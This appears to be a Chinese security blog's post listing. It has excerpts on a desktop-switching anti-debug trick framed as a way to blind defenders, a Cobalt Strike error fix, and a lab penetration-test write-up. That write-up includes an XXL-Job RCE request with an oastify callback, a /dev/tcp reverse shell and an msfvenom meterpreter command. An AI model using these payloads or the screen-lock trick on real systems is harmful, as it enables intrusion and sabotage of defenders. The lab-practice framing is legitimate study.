一行代码物理致盲蓝队

昨天我在学习反调试,参考https://anti-debug.checkpoint.com/techniques/interactive.html这个大佬写的,这是一个窗口切换代码 BOOL Switch() { HDESK hNewDesktop = CreateDesktopA( "test", NULL, NULL, 0, DESKTOP_CREATEWINDOW | DESKTOP_WRITEOBJECTS | DESKTOP_SWITCHDESKTOP, NULL); if (!hNewDesktop) return FALSE; return SwitchDesktop(hNewDesktop); } 编译之后以运行,整个物理机就gg了,全白屏,为了演示效果大概像这样,不知道为什么虚拟机是黑的,不过效果都一样: 据我所知,一旦进入这种窗口切换模式,外面的蓝队想返回桌面变得近乎不可能,虽然后台的程序一切正常,不过除非危机关头,差一点到核心内网,要擦除工具后门遗留的数据等等,不要使用。 排查思考 目前来说只有重启系统才能恢复到正常,不过有些APT勒索组织要是把这玩意加入进启动项,那就是噩梦的开始了,物理机一般用F8可以进入安全启动模式,安全启动模式只会加载系统核心的组件,方便我们排查这类恶意的程序,但是虚拟机似乎没有很好的办法进入安全启动模式,按照官方文档F8依然没办法进去,一般我们要登陆进去才能去启动安全模式,但是登陆进去瞬间黑屏的话非常难受 其他可能都方法 一般企业可能有下方执行命令的系统,可以直接下发命令去删除这类启动项计划任务,或者这台虚拟机不止一个账户,用其他账户登陆也可能不受影响,也直接利用135、445端口的那种横向技巧也能登陆进来,不过现在就3389开着多似乎也不是一个好主意。。。。 完

April 19, 2024 · 1 min · Theme PaperMod

解决cobaltstrike启动的空指针错误

背景 某天上午虚拟机突然卡死崩溃,再次启动我的cobaltstrike,运行发现报java空指针错误,搞了一上午也没找到原因,下午睡觉起来找到了是颜色设置的问题 错误和解决 报错内容大概是这样的: java.lang.NumberFormatException during cortana bridge: &openEventLog [Aggressor Script Event Queue]: Zero length string java.lang.NumberFormatException: Zero length string at java.base/java.lang.Integer.decode (Integer.java:1401) at java.desktop/java.awt.Color.decode(Color.java:729) at aggressor.Prefs. getColor(Unknown Source) at console.StatusBar.<init>(Unknown Source) at console.Console .<init>(Unknown Source) at console.ActivityConsole.<init>(Unknown Source) at aggressor.windows.EventLog.<init>(Unknown Source) at aggressor.bridges.AggressorBridge.evaluate(Unknown Source) at cortana.SafeFunction.evaluate(Unknown Source) at sleep.engine.CallRequest$FunctionCallRequest.execute(Unknown Source) at sleep.engine.CallRequest.CallFunction(Unknown Source) at sleep.engine.atoms.Call.evaluate(Unknown Source) at sleep.engine.Block.evaluate(Unknown Source) at sleep.engine.Block.evaluate (Unknown Source) at sleep.bridges.SleepClosure.evaluate(Unknown Source) at sleep.engine.CallRequest$ClosureCallRequest.execute(Unknown Source) at sleep....

March 30, 2024 · 1 min · Theme PaperMod

某一次靶场考核过程

本篇是老东家的某个月同事出的靶场渗透测试,都是常规操作,拿来练手提升基础熟练度非常合适 目录扫描发现: 访问发现报错信息: 根据java的包的报错,可以找到源代码,这里我问了chatgpt: 谷歌找到文档,翻到后台: http://192.168.10.70:8080/xxl-job-admin/toLogin 经过翻阅,发现有一个未授权的RCE,最新的那个SSRF进后台RCR的那个没搞出来,这个是老的: POST /run HTTP/1.1 Host: 192.168.10.70:9999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 521 { "jobId":1, "executorHandler":"demoJobHandler", "executorParams":"demoJobHandler", "executorBlockStrategy":"COVER_EARLY", "executorTimeout":0, "logId":1, "logDateTime":1586629003729, "glueType":"GLUE_SHELL", "glueSource":"ping ecujz4ok5rcfvx3kdd5turf0rrxil89x.oastify.com", "glueUpdatetime":1586629003727, "broadcastIndex":0, "broadcastTotal":0 } dns成功触发了: 接下来就是反弹shell, /bin/bash -i >& /dev/tcp/192.168.11.108/8888 0>&1 msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.11.108 LPORT=443 -f elf -o reverse.elf 为了维持住会话,上一下msf:...

March 29, 2024 · 1 min · Theme PaperMod